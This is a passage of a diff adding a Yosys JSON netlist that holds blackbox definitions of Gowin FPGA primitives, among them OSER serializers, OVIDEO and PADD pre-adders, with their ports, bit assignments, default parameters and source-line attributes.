] + } + }, + "cells": { + }, + "netnames": { + "OSCEN": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1920.7-1920.12" + } + }, + "OSCOUT": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:1922.8-1922.14" + } + } + } + }, + "OSER10": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:662.1-681.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "D9": { + "direction": "input", + "bits": [ 2 ] + }, + "D8": { + "direction": "input", + "bits": [ 3 ] + }, + "D7": { + "direction": "input", + "bits": [ 4 ] + }, + "D6": { + "direction": "input", + "bits": [ 5 ] + }, + "D5": { + "direction": "input", + "bits": [ 6 ] + }, + "D4": { + "direction": "input", + "bits": [ 7 ] + }, + "D3": { + "direction": "input", + "bits": [ 8 ] + }, + "D2": { + "direction": "input", + "bits": [ 9 ] + }, + "D1": { + "direction": "input", + "bits": [ 10 ] + }, + "D0": { + "direction": "input", + "bits": [ 11 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 12 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 13 ] + }, + "RESET": { + "direction": "input", + "bits": [ 14 ] + }, + "Q": { + "direction": "output", + "bits": [ 15 ] + } + }, + "cells": { + }, + "netnames": { + "D0": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:674.8-674.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:673.8-673.10" + } + }, + "D2": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:672.8-672.10" + } + }, + "D3": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:671.8-671.10" + } + }, + "D4": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:670.8-670.10" + } + }, + "D5": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:669.8-669.10" + } + }, + "D6": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:668.8-668.10" + } + }, + "D7": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:667.8-667.10" + } + }, + "D8": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:666.8-666.10" + } + }, + "D9": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:665.8-665.10" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:675.8-675.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:676.8-676.12" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:663.9-663.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:677.8-677.13" + } + } + } + }, + "OSER16": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:701.1-728.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "D15": { + "direction": "input", + "bits": [ 2 ] + }, + "D14": { + "direction": "input", + "bits": [ 3 ] + }, + "D13": { + "direction": "input", + "bits": [ 4 ] + }, + "D12": { + "direction": "input", + "bits": [ 5 ] + }, + "D11": { + "direction": "input", + "bits": [ 6 ] + }, + "D10": { + "direction": "input", + "bits": [ 7 ] + }, + "D9": { + "direction": "input", + "bits": [ 8 ] + }, + "D8": { + "direction": "input", + "bits": [ 9 ] + }, + "D7": { + "direction": "input", + "bits": [ 10 ] + }, + "D6": { + "direction": "input", + "bits": [ 11 ] + }, + "D5": { + "direction": "input", + "bits": [ 12 ] + }, + "D4": { + "direction": "input", + "bits": [ 13 ] + }, + "D3": { + "direction": "input", + "bits": [ 14 ] + }, + "D2": { + "direction": "input", + "bits": [ 15 ] + }, + "D1": { + "direction": "input", + "bits": [ 16 ] + }, + "D0": { + "direction": "input", + "bits": [ 17 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 18 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 19 ] + }, + "RESET": { + "direction": "input", + "bits": [ 20 ] + }, + "Q": { + "direction": "output", + "bits": [ 21 ] + } + }, + "cells": { + }, + "netnames": { + "D0": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:721.8-721.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:720.8-720.10" + } + }, + "D10": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:711.8-711.11" + } + }, + "D11": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:710.8-710.11" + } + }, + "D12": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:709.8-709.11" + } + }, + "D13": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:708.8-708.11" + } + }, + "D14": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:707.8-707.11" + } + }, + "D15": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:706.8-706.11" + } + }, + "D2": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:719.8-719.10" + } + }, + "D3": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:718.8-718.10" + } + }, + "D4": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:717.8-717.10" + } + }, + "D5": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:716.8-716.10" + } + }, + "D6": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:715.8-715.10" + } + }, + "D7": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:714.8-714.10" + } + }, + "D8": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:713.8-713.10" + } + }, + "D9": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:712.8-712.10" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:722.8-722.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:723.8-723.12" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:704.9-704.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:724.8-724.13" + } + } + } + }, + "OSER4": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:601.1-619.10" + }, + "parameter_default_values": { + "GSREN": "false", + "HWL": "false", + "LSREN": "true", + "TXCLK_POL": "00000000000000000000000000000000" + }, + "ports": { + "D3": { + "direction": "input", + "bits": [ 2 ] + }, + "D2": { + "direction": "input", + "bits": [ 3 ] + }, + "D1": { + "direction": "input", + "bits": [ 4 ] + }, + "D0": { + "direction": "input", + "bits": [ 5 ] + }, + "TX1": { + "direction": "input", + "bits": [ 6 ] + }, + "TX0": { + "direction": "input", + "bits": [ 7 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 8 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 9 ] + }, + "RESET": { + "direction": "input", + "bits": [ 10 ] + }, + "Q1": { + "direction": "output", + "bits": [ 11 ] + }, + "Q0": { + "direction": "output", + "bits": [ 12 ] + } + }, + "cells": { + }, + "netnames": { + "D0": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:608.8-608.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:607.8-607.10" + } + }, + "D2": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:606.8-606.10" + } + }, + "D3": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:605.8-605.10" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:611.8-611.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:612.8-612.12" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:603.9-603.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:602.9-602.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:613.8-613.13" + } + }, + "TX0": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:610.8-610.11" + } + }, + "TX1": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:609.8-609.11" + } + } + } + }, + "OSER4_MEM": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:621.1-634.10" + }, + "parameter_default_values": { + "GSREN": " ", + "HWL": " ", + "ID": " ", + "LSREN": " ", + "TCLK_SOURCE": " ", + "TXCLK_POL": " " + }, + "ports": { + "Q0": { + "direction": "output", + "bits": [ 2 ] + }, + "Q1": { + "direction": "output", + "bits": [ 3 ] + }, + "D0": { + "direction": "input", + "bits": [ 4 ] + }, + "D1": { + "direction": "input", + "bits": [ 5 ] + }, + "D2": { + "direction": "input", + "bits": [ 6 ] + }, + "D3": { + "direction": "input", + "bits": [ 7 ] + }, + "TX0": { + "direction": "input", + "bits": [ 8 ] + }, + "TX1": { + "direction": "input", + "bits": [ 9 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 10 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 11 ] + }, + "TCLK": { + "direction": "input", + "bits": [ 12 ] + }, + "RESET": { + "direction": "input", + "bits": [ 13 ] + } + }, + "cells": { + }, + "netnames": { + "D0": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:628.11-628.13" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:628.15-628.17" + } + }, + "D2": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:628.19-628.21" + } + }, + "D3": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:628.23-628.25" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:630.17-630.21" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:630.11-630.15" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:631.13-631.15" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:631.18-631.20" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:630.29-630.34" + } + }, + "TCLK": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:630.23-630.27" + } + }, + "TX0": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:629.11-629.14" + } + }, + "TX1": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:629.16-629.19" + } + } + } + }, + "OSER8": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:636.1-660.10" + }, + "parameter_default_values": { + "GSREN": "false", + "HWL": "false", + "LSREN": "true", + "TXCLK_POL": "00000000000000000000000000000000" + }, + "ports": { + "D7": { + "direction": "input", + "bits": [ 2 ] + }, + "D6": { + "direction": "input", + "bits": [ 3 ] + }, + "D5": { + "direction": "input", + "bits": [ 4 ] + }, + "D4": { + "direction": "input", + "bits": [ 5 ] + }, + "D3": { + "direction": "input", + "bits": [ 6 ] + }, + "D2": { + "direction": "input", + "bits": [ 7 ] + }, + "D1": { + "direction": "input", + "bits": [ 8 ] + }, + "D0": { + "direction": "input", + "bits": [ 9 ] + }, + "TX3": { + "direction": "input", + "bits": [ 10 ] + }, + "TX2": { + "direction": "input", + "bits": [ 11 ] + }, + "TX1": { + "direction": "input", + "bits": [ 12 ] + }, + "TX0": { + "direction": "input", + "bits": [ 13 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 14 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 15 ] + }, + "RESET": { + "direction": "input", + "bits": [ 16 ] + }, + "Q1": { + "direction": "output", + "bits": [ 17 ] + }, + "Q0": { + "direction": "output", + "bits": [ 18 ] + } + }, + "cells": { + }, + "netnames": { + "D0": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:647.8-647.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:646.8-646.10" + } + }, + "D2": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:645.8-645.10" + } + }, + "D3": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:644.8-644.10" + } + }, + "D4": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:643.8-643.10" + } + }, + "D5": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:642.8-642.10" + } + }, + "D6": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:641.8-641.10" + } + }, + "D7": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:640.8-640.10" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 14 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:652.8-652.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 15 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:653.8-653.12" + } + }, + "Q0": { + "hide_name": 0, + "bits": [ 18 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:638.9-638.11" + } + }, + "Q1": { + "hide_name": 0, + "bits": [ 17 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:637.9-637.11" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 16 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:654.8-654.13" + } + }, + "TX0": { + "hide_name": 0, + "bits": [ 13 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:651.8-651.11" + } + }, + "TX1": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:650.8-650.11" + } + }, + "TX2": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:649.8-649.11" + } + }, + "TX3": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:648.8-648.11" + } + } + } + }, + "OVIDEO": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:683.1-699.10" + }, + "parameter_default_values": { + "GSREN": "false", + "LSREN": "true" + }, + "ports": { + "D6": { + "direction": "input", + "bits": [ 2 ] + }, + "D5": { + "direction": "input", + "bits": [ 3 ] + }, + "D4": { + "direction": "input", + "bits": [ 4 ] + }, + "D3": { + "direction": "input", + "bits": [ 5 ] + }, + "D2": { + "direction": "input", + "bits": [ 6 ] + }, + "D1": { + "direction": "input", + "bits": [ 7 ] + }, + "D0": { + "direction": "input", + "bits": [ 8 ] + }, + "FCLK": { + "direction": "input", + "bits": [ 9 ] + }, + "PCLK": { + "direction": "input", + "bits": [ 10 ] + }, + "RESET": { + "direction": "input", + "bits": [ 11 ] + }, + "Q": { + "direction": "output", + "bits": [ 12 ] + } + }, + "cells": { + }, + "netnames": { + "D0": { + "hide_name": 0, + "bits": [ 8 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:692.8-692.10" + } + }, + "D1": { + "hide_name": 0, + "bits": [ 7 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:691.8-691.10" + } + }, + "D2": { + "hide_name": 0, + "bits": [ 6 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:690.8-690.10" + } + }, + "D3": { + "hide_name": 0, + "bits": [ 5 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:689.8-689.10" + } + }, + "D4": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:688.8-688.10" + } + }, + "D5": { + "hide_name": 0, + "bits": [ 3 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:687.8-687.10" + } + }, + "D6": { + "hide_name": 0, + "bits": [ 2 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:686.8-686.10" + } + }, + "FCLK": { + "hide_name": 0, + "bits": [ 9 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:693.8-693.12" + } + }, + "PCLK": { + "hide_name": 0, + "bits": [ 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:694.8-694.12" + } + }, + "Q": { + "hide_name": 0, + "bits": [ 12 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:684.9-684.10" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 11 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:695.8-695.13" + } + } + } + }, + "PADD18": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1154.1-1168.10" + }, + "parameter_default_values": { + "ADD_SUB": "0", + "AREG": "0", + "BREG": "0", + "BSEL_MODE": "1", + "PADD_RESET_MODE": "SYNC", + "SOREG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "B": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "ASEL": { + "direction": "input", + "bits": [ 38 ] + }, + "CE": { + "direction": "input", + "bits": [ 39 ] + }, + "CLK": { + "direction": "input", + "bits": [ 40 ] + }, + "RESET": { + "direction": "input", + "bits": [ 41 ] + }, + "SI": { + "direction": "input", + "bits": [ 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59 ] + }, + "SBI": { + "direction": "input", + "bits": [ 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77 ] + }, + "SO": { + "direction": "output", + "bits": [ 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95 ] + }, + "SBO": { + "direction": "output", + "bits": [ 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1155.15-1155.16" + } + }, + "ASEL": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1157.8-1157.12" + } + }, + "B": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1156.15-1156.16" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1158.8-1158.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1158.11-1158.14" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1161.15-1161.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1158.15-1158.20" + } + }, + "SBI": { + "hide_name": 0, + "bits": [ 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1159.18-1159.21" + } + }, + "SBO": { + "hide_name": 0, + "bits": [ 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1160.18-1160.21" + } + }, + "SI": { + "hide_name": 0, + "bits": [ 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1159.15-1159.17" + } + }, + "SO": { + "hide_name": 0, + "bits": [ 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1160.15-1160.17" + } + } + } + }, + "PADD9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1170.1-1184.10" + }, + "parameter_default_values": { + "ADD_SUB": "0", + "AREG": "0", + "BREG": "0", + "BSEL_MODE": "1", + "PADD_RESET_MODE": "SYNC", + "SOREG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10 ] + }, + "B": { + "direction": "input", + "bits": [ 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "ASEL": { + "direction": "input", + "bits": [ 20 ] + }, + "CE": { + "direction": "input", + "bits": [ 21 ] + }, + "CLK": { + "direction": "input", + "bits": [ 22 ] + }, + "RESET": { + "direction": "input", + "bits": [ 23 ] + }, + "SI": { + "direction": "input", + "bits": [ 24, 25, 26, 27, 28, 29, 30, 31, 32 ] + }, + "SBI": { + "direction": "input", + "bits": [ 33, 34, 35, 36, 37, 38, 39, 40, 41 ] + }, + "SO": { + "direction": "output", + "bits": [ 42, 43, 44, 45, 46, 47, 48, 49, 50 ] + }, + "SBO": { + "direction": "output", + "bits": [ 51, 52, 53, 54, 55, 56, 57, 58, 59 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 60, 61, 62, 63, 64, 65, 66, 67, 68 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1171.14-1171.15" + } + }, + "ASEL": { + "hide_name": 0, + "bits": [ 20 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1173.8-1173.12" + } + }, + "B": { + "hide_name": 0, + "bits": [ 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1172.14-1172.15" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 21 ], + "attributes": { + "src": 